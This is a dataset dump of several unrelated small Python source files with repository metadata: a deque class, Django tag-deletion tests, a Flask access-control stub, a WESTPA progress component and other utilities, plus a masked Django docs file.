] | 8 | 2019-03-18T06:37:24.000Z | 2022-01-30T07:50:58.000Z | ds_deque.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | ds_deque.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
class Deque(object):
"""Deque class.
It consists of 6 operations:
- add_front()
- add_rear()
- remove_front()
- remove_rear()
- is_empty()
- size()
"""
def __init__(self):
self.items = []
def add_front(self, item):
self.items.append(item)
def add_rear(self, item):
self.items.insert(0, item)
def remove_front(self):
return self.items.pop()
def remove_rear(self):
return self.items.pop(0)
def is_empty(self):
return self.items == []
def size(self):
return len(self.items)
def main():
d = Deque()
print(d.is_empty())
d.add_rear(4)
d.add_rear('dog')
d.add_front('cat')
d.add_front(True)
print(d.is_empty())
print(d.size())
d.add_rear(8.4)
print(d.remove_rear())
print(d.remove_front())
if __name__ == '__main__':
main()
| 17.912281 | 38 | 0.588639 | 138 | 1,021 | 4.028986 | 0.304348 | 0.113309 | 0.086331 | 0.102518 | 0.079137 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008108 | 0.27522 | 1,021 | 56 | 39 | 18.232143 | 0.743243 | 0.133203 | 0 | 0.0625 | 0 | 0 | 0.016568 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.09375 | 0.125 | 0.5 | 0.1875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
1674b0da032613fbe2cdb9c475aa10e0229cd254 | 436 | py | Python | results.py | shivachoudhary/demo1 | a8ee02e4d2d2ad28095afe173d7547f7b5849eca | [
"Apache-2.0"
] | null | null | null | results.py | shivachoudhary/demo1 | a8ee02e4d2d2ad28095afe173d7547f7b5849eca | [
"Apache-2.0"
] | null | null | null | results.py | shivachoudhary/demo1 | a8ee02e4d2d2ad28095afe173d7547f7b5849eca | [
"Apache-2.0"
] | null | null | null | # !usr/bin/python
# usage: results announcement
print "Enter user name r qualified or not:::"
name=raw_input()
list1=['kalyan','supraja','mahindra','anil','siva','ajay','haritha','keerthi','suhashini','subhashini','nariyan','manoj','santhosh','kumar','niveda','thomos','rasii']
if name in list1 :
print 'Qualified in Exams :::'
print "congratssss---->{}".format(name)
else :
print "Better luck next Time -->{}".format(name)
| 25.647059 | 166 | 0.669725 | 55 | 436 | 5.290909 | 0.8 | 0.068729 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005155 | 0.110092 | 436 | 16 | 167 | 27.25 | 0.744845 | 0.098624 | 0 | 0 | 0 | 0 | 0.54359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
167fcbe471ebdad94b480eab362a4b0690c47b55 | 502 | py | Python | src/hamcrest/library/text/__init__.py | pexip/os-pyhamcrest | 6533db5b8c6f27ff69ffcc661c4160207e35aa47 | [
"BSD-3-Clause"
] | null | null | null | src/hamcrest/library/text/__init__.py | pexip/os-pyhamcrest | 6533db5b8c6f27ff69ffcc661c4160207e35aa47 | [
"BSD-3-Clause"
] | null | null | null | src/hamcrest/library/text/__init__.py | pexip/os-pyhamcrest | 6533db5b8c6f27ff69ffcc661c4160207e35aa47 | [
"BSD-3-Clause"
] | null | null | null | """Matchers that perform text comparisons."""
from isequal_ignoring_case import equal_to_ignoring_case
from isequal_ignoring_whitespace import equal_to_ignoring_whitespace
from stringcontains import contains_string
from stringendswith import ends_with
from stringstartswith import starts_with
from stringmatches import matches_regexp
from stringcontainsinorder import string_contains_in_order
__author__ = "Jon Reid"
__copyright__ = "Copyright 2011 hamcrest.org"
__license__ = "BSD, see License.txt"
| 35.857143 | 68 | 0.864542 | 63 | 502 | 6.428571 | 0.603175 | 0.054321 | 0.093827 | 0.103704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00883 | 0.09761 | 502 | 13 | 69 | 38.615385 | 0.88521 | 0.077689 | 0 | 0 | 0 | 0 | 0.12035 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.7 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1688e111bdcf5685631d758091aeda430704ec41 | 269 | py | Python | tools/wave/data/http_polling_client.py | qanat/wpt | 7c61a4594a95682531367b6956d1c37f8b8fd486 | [
"BSD-3-Clause"
] | 1 | 2021-12-12T18:13:24.000Z | 2021-12-12T18:13:24.000Z | tools/wave/data/http_polling_client.py | qanat/wpt | 7c61a4594a95682531367b6956d1c37f8b8fd486 | [
"BSD-3-Clause"
] | 112 | 2021-09-27T14:39:02.000Z | 2022-03-30T14:26:35.000Z | tools/wave/data/http_polling_client.py | qanat/wpt | 7c61a4594a95682531367b6956d1c37f8b8fd486 | [
"BSD-3-Clause"
] | null | null | null | from .client import Client
class HttpPollingClient(Client):
def __init__(self, session_token, event):
super().__init__(session_token)
self.event = event
def send_message(self, message):
self.message = message
self.event.set()
| 22.416667 | 45 | 0.665428 | 31 | 269 | 5.419355 | 0.483871 | 0.196429 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237918 | 269 | 11 | 46 | 24.454545 | 0.819512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
16c672ef6763d5fea492206fe77a76e34e873f1f | 7,279 | py | Python | django/docs/ref/urls.txt.py | roshanba/mangal | f7b428811dc07214009cc33f0beb665ead402038 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | django/docs/ref/urls.txt.py | roshanba/mangal | f7b428811dc07214009cc33f0beb665ead402038 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | django/docs/ref/urls.txt.py | roshanba/mangal | f7b428811dc07214009cc33f0beb665ead402038 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXX XXX XXX XX XXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXXXXX XXXXXXXXX XXX XXX XX XXXXXXXXX
XX XXXXXXXXXXXXXXX XXXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XX XXXXXXXXXX XXXXXXXXXXX XXXXX XXXXXXXXXXXX XXXXXXXXXX
XXXXXXX XX XXXXXXX XXX XXXXXXXXX XX XXXXXXXXXXXXXXXX XXX XXXXXXXXX
XXXX XXXXXXXXXXX XXXXXX XXXXXXXX XXXX
XXXXXXXXXXX X X
XXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX
XXX
X
XXX XXXXXXXXX XXXXXXXX XXXXXX XX X XXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXX X XXX XXXXXXXX XXX XXXXXX
XXX XXXXXXX XXXXX XXXXXXXX XXXXX XXXXXXXXXXXXXX XXXXXX XX XXXXXXX XXXX XX XXX
XXX XXX XXXX XX XX X XXXXXXX XXXXXXXX XX XXX XXXXX XXX XXXXX XXXXXXXX XXX
XXXXXXX X XXXXXXXXX XXXXXXXXXXXXX XXXXX XXX XXXXXXX XXXX XX XXXXXXXXXXXXXXXXXX
XXXXX XXXXXX XXX XXXXXXXXXX XXXXXXX XXX XXX XXXX XXXXXX XXX XXXX XX XXX
XXXXXXXX XXXXXX XX XXX XXXXX XXX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXX X XXXXXX
XX XXXXXXX XXXXXX XXX XXXXXXXX XXX XXXXX XX XX XXXXXXXX XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX XXXX XXXXXXXX
XXX XXXXXXXX XXXXXXXX XX X XXXX XXXXXXXX XX XXX XXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX XXXXXXXXXXX XXXXXX XX XXX
XXXX XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX XXXXXXXXXX XXXXXXXX XXXXXX XXX XX XXXX XXXXXXXXXX XXXXXXXXX XX XXX XXXX
XXXXXXXX XX XXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXX XX XXXXXXXX
XXX XXXXXXXXXXXX XXX XXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXX XXX XXX XXXXXXXX
XXXXXXXX XX XXXXXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXX
XX XXXXXXXXXX XXXXXXXXXXXXXX XXXXX XXXXXXXXXXXX XXXXXXXXXX
XXXXXXX XX XXXXXXX XXX XXXXXXXXX XX XXXXXXXXXXXXXXXX XXX XXXXXXXXX
XXXX XXXXXXXXXXX XXXXXX XXXXXXXX XXXXXXX
XXXXXXXXXXX X X
XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX
XXX
X
XXX XXXXXXXXX XXXXXXXX XXXXXX XX X XXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXX X XXXXXXX XXXXXXXXXX XXXXXXXXXX
XXXX XXXXXXXX XXXXXXXXXXXX XXXXXXX XXXXXXX XXXXXXXXX XXX XXX XXXXXX XXXXXX
XXXXXXXXX XX XXXX XXXX XXX XXXXXXX XXXXXXXXX XXXX XXXXXX XXXXXXX XXX XXXX XX
XXXXXX XXX XXXXXXXXX XXXX XXXXXXX XXXXXXXXXX XXXX X XXXXX XX XXXXX XXXXXXXX
XXXXXX XXXX XXX XXXXXXX XXXXXXXXXX XXX XXXXXX XX XXX XXXX XX XX XXXXX XXXXXXXXX
XX XXX XXXXXX XXX XXXXXX XXX XX XXXXXXXXXX XXXXXXXXX XXXXXXXXXX XXX XXXXXX XXX
XXXXXX XX XXXXXXXX XXXXXXX XXX XXXX XXXXXXXXXXX
XXX XXXXXXXXX XXXXXXXXXX XXX XXXXXXXX XXXXXXXXX XXX XXX XXXX XX XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXX
XX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
X XXXXXXXX XXXX XXXXX X XXXX XXXXXX XXXXXX XXXX XX XXXXXXX XXXXXXX XXXXXX
XXXX XXXXXX XX XXXXXXXXXX XX XXXX XXXXXX XXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXX
XXXXXXXXXX XXX XXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXX XXXXXXX XXXX XX XXXXXXXX
XXXX XXX XXXX XX XXXXXXXXXX
XXXXXXXX XXX XXXXXXXXXXX XXXXXXXXX XXXXXX XX XXXXXXXXX XX XXX XXXXXXXX
XXXXXXX XX XX XXXXXXXXXXX XXXXXXXXX XX XXXX XXX XXXXXXXXXXXXX XXXXXXXX
XXX XX XXXX XX XXX X XXXXXXXXX XXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXX XXXX XXXXXXX XX XX XXXXXXXX XXXXXX XX XXXXXXXX XXXX XXXXXXX
XXX XXXXXXXX XX X XXXXXXX XXXXXXXXXX XXXX XXXXXXXX XXXX XXX XXXXX XX XXX
XXXXXXXXXXX XXXXXXXXXXX
XXXX XXXXXXX XXXXXXX XXXXXX XXX XXXXXX XXXXX
XXXX XXXXXXXXXX XXXXXXXX XXXXXXXXX XXX XXX XXX XXXXXXX XXXXX XXXXXXXX
XXXXX XXXXXXXXXX XXX
XXXX XXXXXXXXXXXXX XXXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX
XXXX XXXXXXXXXXXXXX XXXXXXXXXXX XXXXXXXXX XXX XXX XXX XXXXXXX XXXXX XXXXXXXX
XXXXX XXXXXXXXXXXXXX XXX
XXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX
XXX XXXXXXXX XXX XXXXXXXXXXX X XXXXXXXXX XXX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX
XXX XXXXXXXXXXXXX XXXXXXXX XX X XXXXXXXXX XXXXXX XXX XXXXXXXXXXXXX XX XXX
XXXXXXXXX XXXX XX XXX XX XXXX XXXXXXXXX XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX XX XXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXX XXX XX XXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXXXXXXX
XXXXXXXXXXXX
XX XXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX
XXXXXX XXXXXXXX XX XXXXXX X XXX XXXXXXX XXX XXXXXXX XXXXX XX XXXXX XXXXXX
XXXX XXXXXXXXXXX XXXXXX XXXXXXXX
XXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX
XXXXXXXXXXX X X
X XXX XXX XXXX XX XXXX XXXXXXX XXXX XXXX XXX
X X XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXXXX
XX XXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXX XXXXXXXXXX
XXXX XXXXXXXX XX XX XXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXXXXXX XXX
XXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXX XXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XX XXXXXX XXXXXXXXXX
X XXXXXXXXX XX X XXXXXX XXXXXXXXXXXX XXX XXXX XXXXXX XXXXXX XXXX XX XXX XXXX
XXXX XXXXXX XX XXXXXX XX XXX XXXX XXXXXX XXX XXXX X XXXXXXX XXXX XXXXXX XX XXXXX
XXXXXXXXX XXX X XXXXXXXX XXXX X XXXXXX XXXX XX XXXX
XX XXXXXXXX XXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX XXX
XXXXXXXXX X XXXXXX XXXXX XX XXXX XX XXXXXXX XXXXXXXXXXX XXX XXXXXXXXXXXXX
XXXXXXXXX XXX XXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XX XXXXXX XXXXXXXXXX
X XXXXXXXXX XX X XXXXXX XXXXXXXXXXXX XXX XXXX XXXXXX XXXXXX XXXX XX XXX XXXX
XXXX XXXXXX XX XXXXXX XX XXX XXXX XXXXXXX XXXX XXX XXXXXXXXXXX XXXXXXXX XX
XXXXXX X XXXXXXXXX
XX XXXXXXXX XXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX XXX
XXXXXXXXX X XXXXXX XXXXX XX XXXX XX XXXXXXX XXXXXXXXXXX XXX XXXXXXXXXXXXX
XXXXXXXXX XXX XXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XX XXXXXX XXXXXXXXXX
X XXXXXXXXX XX X XXXXXX XXXXXXXXXXXX XXX XXXX XXXXXX XXXXXX XXXX XX XXX XXXX
XXXX XXXXXX XX XXXXXX XX XXXX XX XXX XXX XXXXXXXX XXXXXX
XX XXXXXXXX XXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX XXX
XXXXXXXXX X XXXXXX XXXXX XX XXXX XX XXXXXXX XXXXXXXXXXX XXX XXXXXXXXXXXXX
XXXXXXXXX XXX XXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XX XXXXXX XXXXXXXXXX
X XXXXXXXXX XX X XXXXXX XXXXXXXXXXXX XXX XXXX XXXXXX XXXXXX XXXX XX XXX XXXX
XXXX XXXXXX XX XXXXXX XX XXXX XX XXXXXX XXXXXXX XXXXXX XXXXXX XXXXXX XXXX XXX
XXXX XXXXXXX XXXXXX XX XXXX XXXXX
XX XXXXXXXX XXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX XXX
XXXXXXXXX X XXXXXX XXXXX XX XXXX XX XXXXXXX X XXXXXXXXXXX XXXXXXXX XXX XXXXXXX
XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
| 36.395 | 107 | 0.844209 | 849 | 7,279 | 7.237927 | 0.04947 | 0.029292 | 0.014646 | 0.016273 | 0.295525 | 0.256469 | 0.241172 | 0.241172 | 0.227177 | 0.227177 | 0 | 0 | 0.155791 | 7,279 | 199 | 108 | 36.577889 | 1 | 0 | 0 | 0.830986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
16ca20ef19b1e4959b25371a29b36d93124a8849 | 2,699 | py | Python | darvag/tags/tests/test_view_delete_tag.py | Erfi/dorathewordexplorer | 85bcbfd0baf3ba7a2bf511ab9a4fd1087c219c8b | [
"MIT"
] | null | null | null | darvag/tags/tests/test_view_delete_tag.py | Erfi/dorathewordexplorer | 85bcbfd0baf3ba7a2bf511ab9a4fd1087c219c8b | [
"MIT"
] | 17 | 2019-10-03T12:23:41.000Z | 2019-11-05T21:28:46.000Z | darvag/tags/tests/test_view_delete_tag.py | Erfi/german-api | 85bcbfd0baf3ba7a2bf511ab9a4fd1087c219c8b | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.urls import resolve, reverse
from django.contrib.auth.models import User
from django.forms import ModelForm
from tags.models import Tag
from tags.views import TagDeleteView
class TagDeleteTestCase(TestCase):
def setUp(self) -> None:
self.username = 'jane'
self.password = 'doe_123'
self.user = User.objects.create_user(username=self.username, password=self.password, email='jane@doe.com')
self.tag = Tag.objects.create(name='test_tag', created_by=self.user)
self.delete_url = reverse('delete_tag', kwargs={'tag_id': self.tag.id})
class AnonymousUserDeleteTagTests(TagDeleteTestCase):
def test_redirection(self):
login_url = reverse('login')
response = self.client.get(self.delete_url)
self.assertRedirects(response, f'{login_url}?next={self.delete_url}')
class UnauthorizedUserDeleteTagTests(TagDeleteTestCase):
def setUp(self) -> None:
super().setUp()
user = User.objects.create_user(username='john',
email='john@smith.com',
password='smith_123')
self.client.login(username='john', password='smith_123')
self.response = self.client.get(self.delete_url)
def test_status_code(self):
"""
Deck can only be deleted by the owner.
Unauthorized user should get a 404 error.
"""
self.assertEquals(self.response.status_code, 404)
class LoggedInUserDeleteTagTests(TagDeleteTestCase):
def setUp(self) -> None:
super().setUp()
self.client.login(username=self.username, password=self.password)
self.response = self.client.get(self.delete_url)
def test_status_code(self):
self.assertEquals(self.response.status_code, 200)
def test_url_resolves_delete_view(self):
view = resolve(self.delete_url)
self.assertEquals(view.func.view_class, TagDeleteView)
def test_csrf_token(self):
self.assertContains(self.response, 'csrfmiddlewaretoken')
def test_inputs(self):
"""
csrf-token and confirm button inputs
"""
self.assertContains(self.response, '<input', 2)
class SuccessfulDeleteTagTests(TagDeleteTestCase):
def setUp(self) -> None:
super().setUp()
self.client.login(username=self.username, password=self.password)
self.response = self.client.post(self.delete_url, data={})
def test_redirect(self):
redirect_url = reverse('list_tags')
self.assertRedirects(self.response, redirect_url)
def test_deck_deleted(self):
self.assertEquals(Tag.objects.count(), 0)
| 34.602564 | 114 | 0.672471 | 317 | 2,699 | 5.602524 | 0.283912 | 0.031532 | 0.051239 | 0.036036 | 0.330518 | 0.330518 | 0.232545 | 0.189189 | 0.189189 | 0.189189 | 0 | 0.009447 | 0.215635 | 2,699 | 77 | 115 | 35.051948 | 0.829476 | 0.043349 | 0 | 0.25 | 0 | 0 | 0.063316 | 0.013455 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.230769 | false | 0.115385 | 0.115385 | 0 | 0.442308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
16ce7834a652c28c299d8da1d173f4c059628ed6 | 200 | py | Python | piret/workflows/__init__.py | bos-lab/piret | 23ecdf80331d72612bb2f48ab3207117673c373d | [
"BSD-3-Clause"
] | 2 | 2017-05-04T05:25:43.000Z | 2017-08-02T19:20:53.000Z | piret/workflows/__init__.py | bos-lab/piret | 23ecdf80331d72612bb2f48ab3207117673c373d | [
"BSD-3-Clause"
] | 7 | 2018-01-24T16:39:47.000Z | 2018-04-11T16:49:42.000Z | piret/workflows/__init__.py | bos-lab/piret | 23ecdf80331d72612bb2f48ab3207117673c373d | [
"BSD-3-Clause"
] | 4 | 2019-01-03T05:40:02.000Z | 2021-12-06T22:41:13.000Z | """Importing."""
import os
import sys
dir_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append(dir_path)
from single_seq import SingleSeq
from dual_seq import DualSeq
"""Importing."""
| 18.181818 | 54 | 0.765 | 30 | 200 | 4.833333 | 0.533333 | 0.096552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 200 | 10 | 55 | 20 | 0.805556 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
16cecc5759b711965a5ca03f91e3b3cb9f8dee73 | 499 | py | Python | src/westpa/tools/progress.py | jdrusso/westpa_test | 3383b59a5a6ec5401415e74eb5a7fc61e4b3abbc | [
"MIT"
] | 1 | 2022-02-04T17:07:28.000Z | 2022-02-04T17:07:28.000Z | src/westpa/tools/progress.py | jdrusso/westpa_test | 3383b59a5a6ec5401415e74eb5a7fc61e4b3abbc | [
"MIT"
] | 4 | 2022-01-24T18:13:36.000Z | 2022-02-18T06:19:05.000Z | src/westpa/tools/progress.py | SHZ66/westpa | c91711bf8f1f75359c0d4d28765a6d587dfd6adc | [
"MIT"
] | 1 | 2021-01-09T22:46:25.000Z | 2021-01-09T22:46:25.000Z | import westpa
from westpa.core.progress import ProgressIndicator
from westpa.tools.core import WESTToolComponent
class ProgressIndicatorComponent(WESTToolComponent):
def __init__(self):
super().__init__()
self.indicator = None
def add_args(self, parser):
pass
def process_args(self, args):
self.indicator = ProgressIndicator()
if westpa.rc.quiet_mode or westpa.rc.verbose_mode or westpa.rc.debug_mode:
self.indicator.fancy = False
| 27.722222 | 82 | 0.711423 | 58 | 499 | 5.896552 | 0.517241 | 0.114035 | 0.070175 | 0.081871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210421 | 499 | 17 | 83 | 29.352941 | 0.86802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0.076923 | 0.230769 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
16d46080873c1d194a8820f9e01183aec5b53d11 | 456 | py | Python | colornumber.py | kkdp13/testforbot | 7655d2b9ba88f5bb93baaf204724681bfe1c5934 | [
"Apache-2.0"
] | null | null | null | colornumber.py | kkdp13/testforbot | 7655d2b9ba88f5bb93baaf204724681bfe1c5934 | [
"Apache-2.0"
] | null | null | null | colornumber.py | kkdp13/testforbot | 7655d2b9ba88f5bb93baaf204724681bfe1c5934 | [
"Apache-2.0"
] | null | null | null | # colorcodingfor rows(...)
def colornumber(color):
if color == 'd':
return 0
elif color == 'e':
return 1
elif color == 'f':
return 2
elif color == 'g':
return 3
elif color == 'h':
return 4
elif color == 'i':
return 5
elif color == 'j':
return 6
elif color == 'k':
return 7
elif color == 'l':
return 8
else:
return 9 | 20.727273 | 27 | 0.436404 | 53 | 456 | 3.754717 | 0.528302 | 0.361809 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03937 | 0.442982 | 456 | 22 | 28 | 20.727273 | 0.744094 | 0.052632 | 0 | 0 | 0 | 0 | 0.021951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
16d69fc9f8e6c45b3341af613e76cbd08ea9ed5a | 4,588 | py | Python | flask_ac/ac_manager.py | gawainguo/Flask-AC | 6b7c7ebe7721b1208d7596999ce29852a7e1879c | [
"MIT"
] | 3 | 2018-11-09T09:06:01.000Z | 2018-11-11T15:38:45.000Z | flask_ac/ac_manager.py | gawainguo/Flask-AC | 6b7c7ebe7721b1208d7596999ce29852a7e1879c | [
"MIT"
] | 1 | 2018-11-11T15:39:04.000Z | 2018-11-15T02:31:32.000Z | flask_ac/ac_manager.py | gawainguo/Flask-AC | 6b7c7ebe7721b1208d7596999ce29852a7e1879c | [
"MIT"
] | null | null | null | '''
This module provide ACManager class
'''
from flask import g
from flask_ac import ptree
class ACManager(object):
'''
ACManager is defination of access control manager,
which hold the loaders and other configs for access control.
Instance of ACManager can bounded to several apps, by using init_app
method in your application's factory.
To initialize ACManager, the permissions object is required.
This dict object provide all the permissions with name and key
